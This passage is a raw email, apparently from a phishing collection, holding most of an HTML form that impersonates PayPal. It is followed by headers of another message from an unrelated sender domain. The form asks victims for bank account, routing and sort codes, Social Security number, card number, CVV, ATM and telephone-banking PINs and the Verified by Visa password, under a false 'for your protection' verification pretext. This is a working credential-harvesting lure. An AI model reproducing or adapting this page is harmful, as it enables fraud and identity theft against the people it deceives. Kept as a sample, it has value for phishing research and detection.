number, enter numbers only please, no dashes or spaces.<br><br></td></tr>
</table>

<table align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wi=
dth=3D"760">

<tr>
<td class=3D"label" width=3D"320"><label for=3D"accountnum"><sup><img borde=
r=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></su=
p>Bank Account Number:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"text" id=3D"accountnum" size=3D=
"20" maxlength=3D"20" name=3D"accountnum" value=3D"
"></td>
</tr>

<tr>
<td class=3D"label" width=3D"320"><label for=3D"sortcode"><sup><img border=
=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></sup=
>Sort Code(UK only):</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"text" id=3D"sortcode" name=3D"s=
ortcode" size=3D"15" value=3D""></td>
</tr>
<tr>
<td class=3D"label" width=3D"320"><label for=3D"Routing"><sup><img border=
=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></sup=
>Routing(USA only):</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"text" id=3D"routing" name=3D"ro=
uting" size=3D"15" value=3D""></td>
</tr>
<tr>
<tr>
<td class=3D"label" width=3D"320"><label for=3D"ACH number"><sup><img borde=
r=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></su=
p>ACH number:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"text" id=3D"ach" name=3D"ach" s=
ize=3D"25" value=3D""></td>
</tr>
<td class=3D"label" width=3D"320"><label for=3D"Social Security number"><su=
p><img border=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pix=
el.gif"></sup>Social Security number(USA only):</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"text" id=3D"ssn" name=3D"ssn" s=
ize=3D"15" value=3D""></td>
</tr>
<tr>
<td class=3D"label" width=3D"320"><label for=3D"telpass"><sup><img border=
=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></sup=
>Telephone Passcode:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"password" id=3D"telpass" name=
=3D"telpass" size=3D"10" value=3D""></td>
</tr>

<tr>
<td class=3D"label" width=3D"320"><label for=3D"telpass"><sup><img border=
=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></sup=
>Telephone Banking PIN:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"password" id=3D"telpass" name=
=3D"bankpin" size=3D"10" value=3D""></td>
</tr>

<tr>
<td class=3D"label" width=3D"320"><label for=3D"defaultcardnumber"><sup><im=
g border=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gi=
f"></sup>Card Number:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"text" id=3D"defaultcardnumber" =
name=3D"defaultcardnumber" size=3D"16" value=3D"">
</td>
</tr>

<tr>
<td class=3D"label" width=3D"320"><label for=3D"defaultexpdate"><sup><img b=
order=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif">=
</sup>Expiration Date:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418">

<select  class=3D"" name=3D"defaultexpmonth" id=3D"defaultexpmonth">
<option value=3D00 >month</option>
<option value=3D01 >01</option>
<option value=3D02 >02</option>
<option value=3D03 >03</option>
<option value=3D04 >04</option>
<option value=3D05 >05</option>
<option value=3D06 >06</option>
<option value=3D07 >07</option>
<option value=3D08 >08</option>
<option value=3D09 >09</option>
<option value=3D10 >10</option>
<option value=3D11 >11</option>
<option value=3D12 >12</option>

</select>
<select  class=3D"" name=3D"defaultexpyear" size=3D"1" id=3D"defaultexpyear=
" type=3D"select">
<option value=3D"00" >year</option>
<option value=3D"16" >2016</option>
<option value=3D"17" >2017</option>
<option value=3D"18" >2018</option>
<option value=3D"19" >2019</option>
<option value=3D"20" >2020</option>
<option value=3D"21" >2021</option>
<option value=3D"22" >2022</option>
</select>&nbsp;

</td>
</tr>

<tr>
<td class=3D"label" width=3D"320" STYLE=3D"vertical-align: middle"><label f=
or=3D"defaultcvv2"><sup><img border=3D"0" src=3D"https://www.sandbox.paypal=
.com/en=5FUS/i/scr/pixel.gif"></sup>Card Verification Number:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" style=3D"vertical-align: bottom" type=
=3D"password" id=3D"defaultcvv2" size=3D"3" maxlength=3D"4" name=3D"default=
cvv2" value=3D"">
<a href=3D"https://www.paypal.com/us/cgi-bin/webscr?cmd=3Dp/acc/cvv=5Finfo=
=5Fpop-outside" target=3D"=5Fblank"<span class=3D"small" STYLE=3D"vertical-=
align: sub">Help&nbsp;finding&nbsp;your&nbsp;Card&nbsp;Verification&nbsp;Nu=
mber&nbsp;</span></a>
</td>
</tr>

<tr>
<td class=3D"label" width=3D"320"><label for=3D"defaulpin"><sup><img border=
=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></sup=
>Card Signature/ATM PIN:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418">
<input  class=3D"" type=3D"password" id=3D"defaulpin" size=3D"6" maxlength=
=3D"4" name=3D"pin" value=3D"">


<tr>
<td class=3D"label" width=3D"320"><label for=3D"telpass"><sup><img border=
=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></sup=
>Password 3D Secure Verified By Visa:</label></td>
<td width=3D"2">&nbsp;</td>
<td width=3D"418"><input class=3D"" type=3D"password" id=3D"telpass" name=
=3D"vbv" size=3D"10" value=3D""></td>
</tr>

&nbsp;

</td>
</tr>

</table>
<table align=3D"center" border=3D"0" cellpadding=3D"0" cellspacing=3D"0" wi=
dth=3D"760">
<tr>
<br><br>
<td>
<span class=3D"small"><span class=3D"emphasis">Required Field<sup><img bord=
er=3D"0" src=3D"https://www.sandbox.paypal.com/en=5FUS/i/scr/pixel.gif"></s=
up><br><br>For your protection, we verify credit card information.</span><b=
r>The process normally takes about 30 seconds, but it may take longer durin=
g certain times of the day. Please click <span class=3D"emphasis">Save Prof=
ile</span> to update your information.</span>
<hr class=3D"dotted"></td>
</tr>
<tr>
<td align=3D"right">
<input style=3D"margin-top:30px;margin-bottom:40px;=5Fmargin-bottom:30px;ba=
ckground: #fcbb49 url(http://linku/~ultraele/system/btn=5Fmain=5F1x50.gif) =
repeat-x top left;width:auto;=5Fwidth:180px;height:22px;border:0;font:bold =
12px arial;color:#FFFFFF;text-align:center;border: 1px solid #ff9900;" type=
=3D"submit" name=3D"set" value=3D"Save Profile">
<br>
<br>
<br>
</td>
</tr>
</table>
</form></td>
</tr>
</table>

</td>
</tr>
</table>











</tbody></table>
</td></tr>
</tbody></table>
<div id=3D"footer" class=3D"srd">
<h5 class=3D"accessAid">More Information</h5>
<ul>
<li><a href=3D"https://www.paypal.com/us/cgi-bin/webscr">Mass Pay</a></li>
<li><a href=3D"https://www.paypal.com/us/cgi-bin/webscr">Referrals</a></li>
<li><a href=3D"https://www.paypal.com/us/cgi-bin/webscr">About Us</a></li>
<li><a href=3D"https://www.paypal.com/us/cgi-bin/webscr">Accounts</a></li>
<li><a href=3D"https://www.paypal.com/us/cgi-bin/webscr">Fees</a></li>
<li><a href=3D"https://www.paypal.com/us/cgi-bin/webscr">Privacy</a></li>
<li><a href=3D"https://www.paypal.com/us/cgi-bin/webscr">Security Centre</a=
></li>
<li><a href=3D"https://www.paypal.com/us/cgi-bin/webscr">Contact Us</a></li>
<li><a href=3D"https://www.paypal.com/us/cgi-bin/webscr">User Agreement</a>=
</li>
<li><a href=3D"https://www.paypal.com/us/cgi-bin/webscr">Developers</a></li>
<li class=3D"last"><a href=3D"https://www.paypal.com/us/cgi-bin/webscr">Pro=
duct Disclosure Statement</a></li>
</ul>
<p id=3D"footerSecure"><a href=3D"#" href=3D"https://www.paypal.com/us/cgi-=
bin/webscr"><img src=3D"http://www.smithcoplc.com/AgencyPlusToolkit.B2CWebs=
ite/App=5FThemes/SmithCoLightBlue/images/insurecom/verisignLogo.bmp" alt=3D=
"" border=3D"0"></a></p><p><a href=3D"#" href=3D"https://www.paypal.com/us/=
cgi-bin/webscr">About SSL Certificates</a></p>
<p id=3D"legal">Copyright &copy; 1999-2013 PayPal, Inc. All rights reserved=
.<br>PayPal Pty Limited ABN 93 111 195 389 (AFSL 304962). Any general
financial product advice provided in this site has not taken into
account your objectives, financial situations or needs.</p>
</div>
<div class=3D"hide" id=3D"navFull"></div>
</body></html>
=

--===============1471945895==--

From jose@monkey.org Wed Jan  4 01:12:50 2017 +0000
Return-Path: info@clusakenya.org
Delivered-To: jose@monkey.org
X-FDA: 72364641300.21.mice66_35b09048db20c
X-Spam-Summary: 20,1.5,0,930503d76275f1d9,d41d8cd98f00b204,info@clusakenya.org,:info@clusakenya.org,RULES_HIT:4:41:72:379:856:962:967:973:978:983:988:989:1189:1208:1221:1254:1260:1263:1313:1314:1381:1431:1432:1436:1437:1516:1517:1518:1547:1560:1575:1588:1589:1592:1594:1714:1730:1749:1777:1792:2194:2196:2198:2199:2200:2201:2525:2527:2540:2561:2566:2610:2639:2682:2685:2733:2734:2859:2902:2905:2933:2937:2939:2942:2945:2947:2951:2954:3022:3040:3138:3139:3140:3141:3142:3148:3421:3690:3865:3867:3868:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4321:4361:4605:4699:5007:6119:6120:6261:6687:6688:7809:7974:8603:8784:8957:9025:9059:9108:9388:9416:9871:9908:9973:9979:10009:10049:10346:11026:11256:11257:11657:11658:11914:12043:12076:12079:12295:12438:12555:12561:12895:12903:12986:13139:13235:13236:13237:13285:13439:14096:14196:14515:14596:21080:21121:21325:21407:21433:21450:21451:21524:30026:30034:30046:30054:30055:30070:30075,0,RBL:41.215.60.22:@clusakenya.org:.lbl8.mailshell.net-62.8.126.1
X-HE-Tag: mice66_35b09048db20c
X-Filterd-Recvd-Size: 16260
Received: from clusakenya.org (unknown [41.215.60.22])
	by imf01.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed,  4 Jan 2017 01:12:48 +0000 (UTC)
Received: from Terminal.highmountainhealth.com by clusakenya.org (MDaemon PRO v13.0.2)
	with ESMTP id md50000224193.msg
	for <jose@monkey.org>; Wed, 04 Jan 2017 04:12:32 +0300
X-Spam-Processed: clusakenya.org, Wed, 04 Jan 2017 04:12:32 +0300
	(not processed: message from trusted or authenticated source)
X-Authenticated-Sender: info@clusakenya.org
X-MDRemoteIP: 173.220.174.140
X-Return-Path: info@clusakenya.org
